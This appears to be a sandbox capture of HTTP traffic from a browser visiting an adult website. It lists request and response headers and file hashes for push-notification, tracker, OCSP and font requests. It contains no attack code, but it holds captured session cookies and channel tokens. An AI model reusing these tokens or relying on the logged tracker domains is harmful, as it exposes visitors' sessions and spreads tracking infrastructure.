                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:34:08 GMT
expires: Thu, 14 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 114451
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F5234651A9989D8681830C367DBCCCF7B8C5205B67B27DFA4F0CDF3923D815F2"
Last-Modified: Tue, 13 Sep 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17306
Expires: Fri, 16 Sep 2022 08:10:05 GMT
Date: Fri, 16 Sep 2022 03:21:39 GMT
Connection: keep-alive

                                        
                                            GET /mng/channels/sw.min.js HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

                                         
                                         54.230.111.2
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 6178
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Thu, 15 Sep 2022 05:50:56 GMT
etag: "b2405c913e932b43ebf78735d6443f3e"
x-cache: Hit from cloudfront
via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: VxAxK_HDqVNSmFwN8MZRb4Dz62LpjgGy5qhLscLUk1ZT6G01WlTn6g==
age: 77534
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   6178
Md5:    b2405c913e932b43ebf78735d6443f3e
Sha1:   0bc31e5f485d5080be019d8494be42b0b1a3c860
Sha256: e8ee0d1cbe8b059c84f744ac6ed1b37205bbca409c174c0bd4376e738e1b7e11
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 2ZwOkH/f5Fgt57RIAwyATA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         34.218.164.174
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: YNgEl3npuJClznt9ZUB/saUCfSY=

                                        
                                            GET /jscode/JAIA.js?sub1=girlforfuck.com&sub2=&sub3=&sub4=&sub5=&prid= HTTP/1.1 
Host: alexatracker.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         51.68.197.173
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 16 Sep 2022 03:21:39 GMT
Content-Length: 9523
Connection: keep-alive
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: trbarid=a44058eca646af6fe65211d074257b3c2f501c818294e0581b86d073748579d1a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22trbarid%22%3Bi%3A1%3Bi%3A2308235737157594051%3B%7D; expires=Fri, 20-Sep-2024 03:21:39 GMT; Max-Age=63504000; path=/; secure; HttpOnly; SameSite=None


--- Additional Info ---
Magic:  ASCII text, with very long lines (9523), with no line terminators
Size:   9523
Md5:    f3622e2c5e74c808be597dc2525980a3
Sha1:   aa76aa7425eb2e0e7db09e5af998d1cd8e876e97
Sha256: a41a12c8e52b509f7f729c5413adc89a2f4291a62b2eb67f057e8e4caccde080
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.88
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Fri, 16 Sep 2022 03:21:39 GMT
Last-Modified: Fri, 16 Sep 2022 03:13:54 GMT
Server: ECS (dcb/7F38)
X-Cache: Miss from cloudfront
Via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 1IvS0c8hIecAAZiq7cpt7DXH95P3LFYBz8O9g6gnWLwPL5jvRbGT_A==
Age: 465


--- Additional Info ---
Magic:  data
Size:   33103
Md5:    58121d2779973ed8bf3a7b8227fd55a6
Sha1:   ece64c869dba937286317d475152582c0ac5b5bf
Sha256: 71323e8d9f4bce74c299c59b7e4ad76c48d10c9bbf0bebd5fbe64e37ca5e765a
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.88
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Fri, 16 Sep 2022 03:21:39 GMT
Last-Modified: Fri, 16 Sep 2022 01:41:29 GMT
Server: ECS (dcb/7F5B)
X-Cache: Miss from cloudfront
Via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: AZtjQutkxs1nkuzEUglUmMUy0Shq_pL0531hQ-Y3neXWeX3-gcfy2g==
Age: 6011

                                        
                                            GET /u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100 HTTP/1.1 
Host: lh3.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.142
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
location: https://accounts.google.com/ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en
cache-control: private
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Fri, 16 Sep 2022 03:21:39 GMT
server: fife
content-length: 337
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF, LF line terminators
Size:   337
Md5:    66a43eafe19fd2e9782007272dd06ced
Sha1:   9d5112f8b4482ef224d10b0d0a17bfaf053e8e23
Sha256: f432da756645f1aa0bdfff17c86556d7343c5ae482f941597552d9701560d6bb
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            OPTIONS /api/v1/code-snippet/ HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: GET
Access-Control-Request-Headers: channel-token
Referer: https://www.girlforfuck.com/
Origin: https://www.girlforfuck.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         3.133.16.5
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
date: Fri, 16 Sep 2022 03:21:39 GMT
content-length: 0
server: gunicorn/19.9.0
vary: Origin
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
access-control-allow-headers: accept, accept-encoding, authorization, content-type, origin, x-csrftoken, x-requested-with, X-Push-Channel-Id, Channel-Token
access-control-allow-methods: DELETE, GET, OPTIONS, PATCH, POST, PUT
access-control-max-age: 86400
x-content-type-options: nosniff
referrer-policy: same-origin
X-Firefox-Spdy: h2

                                        
                                            GET /ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 16 Sep 2022 03:21:39 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S269475618%3A1663298499572194&continue=https%3A%2F%2Flh3.google.com%2Fu%2F0%2Fd%2F1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQDHYWo0DRnFKfrUJp3LNz6hmsdMv22s2mgbJLRQCcUhHyoPbC5JYPYlbG10EOro5wy9ZBW0nm6VeQ
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'nonce-oky7PqMHe5e-BWVs-GaNyg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 409
server: GSE
set-cookie: __Host-GAPS=1:XRHg2v_XtgUIctfNLXvG1q7eEjMtkA:lHjpbbESLaA1NrYv;Path=/;Expires=Sun, 15-Sep-2024 03:21:39 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (385)
Size:   409
Md5:    4d3af7cc0f24da32de7a9606478c03b5
Sha1:   05ac5cd9ba91d0c24282a42d93608d7f2bf59db3
Sha256: d1af7a7512647eae45cc6e777a43ba4c58afdee1f95255969d0f6d028a898230
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /api/v1/code-snippet/ HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Channel-Token: ZmYyMGRjMTRhMjE1ZGY0NWE3MDc1ZTE2ZjNkZWViOWI9MTEwMjM9Lw==
Origin: https://www.girlforfuck.com
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         3.133.16.5
HTTP/2 200 OK
content-type: application/json
                                        
date: Fri, 16 Sep 2022 03:21:39 GMT
content-length: 1621
server: gunicorn/19.9.0
vary: Accept, Origin
allow: GET, POST, HEAD, OPTIONS
x-frame-options: DENY
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
x-content-type-options: nosniff
referrer-policy: same-origin
set-cookie: attached-subscription-window-id-11023=7461; Path=/
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- HTML document text\012- HTML document, ASCII text, with very long lines (1621), with no line terminators
Size:   1621
Md5:    f8bd72cbe64bd6e1da6b8b71136acdcd
Sha1:   3f834e871cfbee67f7ff86ea69c15054a4d880ff
Sha256: 7095e31dacc9920a97af8c1f224962248a746f8b67b9558443a9d0dfd862f191
                                        
                                            OPTIONS /api/v1/window-session-rules/?name=allow_notifications&value=0&window=7461 HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: GET
Access-Control-Request-Headers: channel-token,content-type
Referer: https://www.girlforfuck.com/
Origin: https://www.girlforfuck.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         3.133.16.5
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
date: Fri, 16 Sep 2022 03:21:39 GMT
content-length: 0
server: gunicorn/19.9.0
vary: Origin
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
access-control-allow-headers: accept, accept-encoding, authorization, content-type, origin, x-csrftoken, x-requested-with, X-Push-Channel-Id, Channel-Token
access-control-allow-methods: DELETE, GET, OPTIONS, PATCH, POST, PUT
access-control-max-age: 86400
x-content-type-options: nosniff
referrer-policy: same-origin
X-Firefox-Spdy: h2

                                        
                                            GET /api/v1/window-session-rules/?name=allow_notifications&value=0&window=7461 HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=UTF-8
Channel-Token: ZmYyMGRjMTRhMjE1ZGY0NWE3MDc1ZTE2ZjNkZWViOWI9MTEwMjM9Lw==
Origin: https://www.girlforfuck.com
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         3.133.16.5
HTTP/2 204 No Content
                                        
date: Fri, 16 Sep 2022 03:21:39 GMT
server: gunicorn/19.9.0
vary: Accept, Origin
allow: GET, POST, HEAD, OPTIONS
x-frame-options: DENY
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
x-content-type-options: nosniff
referrer-policy: same-origin
X-Firefox-Spdy: h2

                                        
                                            GET /image/94fb8735b2b44af1be1dd3a6abc35488/image.jpg HTTP/1.1 
Host: img.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.21.234.130
HTTP/2 200 OK
content-type: image/png
                                        
date: Fri, 16 Sep 2022 03:21:40 GMT
content-length: 83958
expires: Fri, 16 Sep 2022 14:51:48 GMT
etag: "696c3ad22a3ad0979273b0c1cb95b8137e982106"
cache-control: public, max-age=86400
access-control-allow-origin: *
access-control-allow-methods: GET, PUT, POST, DELETE, HEAD, PATCH
access-control-allow-headers: Origin, Authorization, X-Requested-With, X-Push-Channel-Id, Content-Type, Accept, Channel-Token
access-control-allow-credentials: true
cf-cache-status: HIT
age: 44992
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tEiU6%2Bi6mg3tNGZXjzHif%2BnCsPe3szslHJSsnyMsFVRLtBNJOES7R5u%2Fpvb0tN8WKoN80vN5DH%2FpFQBa8qXgmvUmQovXSqyzvusrhtubygovkl4tY0EHF08LVzVi%2FGYJPqGYs04sBA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 74b679291e2c7332-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 240 x 240, 8-bit/color RGBA, non-interlaced\012- data
Size:   83958
Md5:    a580c6079560bb93127cc5fbf8fcf24a
Sha1:   696c3ad22a3ad0979273b0c1cb95b8137e982106
Sha256: aa310671e294fb2c24558a185affcaa2369ea47e1f53bb8a7de5176c13e79032
                                        
                                            OPTIONS /api/v1/session-events/ HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: POST
Access-Control-Request-Headers: channel-token,content-type
Referer: https://www.girlforfuck.com/
Origin: https://www.girlforfuck.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         3.133.16.5
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
date: Fri, 16 Sep 2022 03:21:40 GMT
content-length: 0
server: gunicorn/19.9.0
vary: Origin
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
access-control-allow-headers: accept, accept-encoding, authorization, content-type, origin, x-csrftoken, x-requested-with, X-Push-Channel-Id, Channel-Token
access-control-allow-methods: DELETE, GET, OPTIONS, PATCH, POST, PUT
access-control-max-age: 86400
x-content-type-options: nosniff
referrer-policy: same-origin
X-Firefox-Spdy: h2

                                        
                                            POST /api/v1/session-events/ HTTP/1.1 
Host: manager.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=UTF-8
Channel-Token: ZmYyMGRjMTRhMjE1ZGY0NWE3MDc1ZTE2ZjNkZWViOWI9MTEwMjM9Lw==
Content-Length: 46
Origin: https://www.girlforfuck.com
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         3.133.16.5
HTTP/2 201 Created
                                        
date: Fri, 16 Sep 2022 03:21:40 GMT
content-length: 0
server: gunicorn/19.9.0
vary: Accept, Origin
allow: POST, OPTIONS
x-frame-options: DENY
access-control-allow-credentials: true
access-control-allow-origin: https://www.girlforfuck.com
x-content-type-options: nosniff
referrer-policy: same-origin
set-cookie: session_uuid=e6ec2772-2a77-4a97-a816-f0cdf8fc805c; expires=Sat, 16 Sep 2023 03:21:40 GMT; Max-Age=31536000; Path=/
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "63C277B85854C244E38F5B3E60A073EB15962A0784BA1B726353E3EC0C3E9E02"
Last-Modified: Thu, 15 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2871
Expires: Fri, 16 Sep 2022 04:09:31 GMT
Date: Fri, 16 Sep 2022 03:21:40 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "63C277B85854C244E38F5B3E60A073EB15962A0784BA1B726353E3EC0C3E9E02"
Last-Modified: Thu, 15 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2871
Expires: Fri, 16 Sep 2022 04:09:31 GMT
Date: Fri, 16 Sep 2022 03:21:40 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "63C277B85854C244E38F5B3E60A073EB15962A0784BA1B726353E3EC0C3E9E02"
Last-Modified: Thu, 15 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2871
Expires: Fri, 16 Sep 2022 04:09:31 GMT
Date: Fri, 16 Sep 2022 03:21:40 GMT
Connection: keep-alive

                                        
                                            GET /css2?family=Roboto:wght@400;700&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 16 Sep 2022 03:21:38 GMT
date: Fri, 16 Sep 2022 03:21:38 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   2806
Md5:    3caf9d557505a53b968a6be5cea059f1
Sha1:   9281b663ecb8981e804aabf9eaf9cadf9dd3eaa2
Sha256: 9791012a5f955c039beff2de9c515e1e32645b7f16299f6595f477dd5cc8e5cf
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
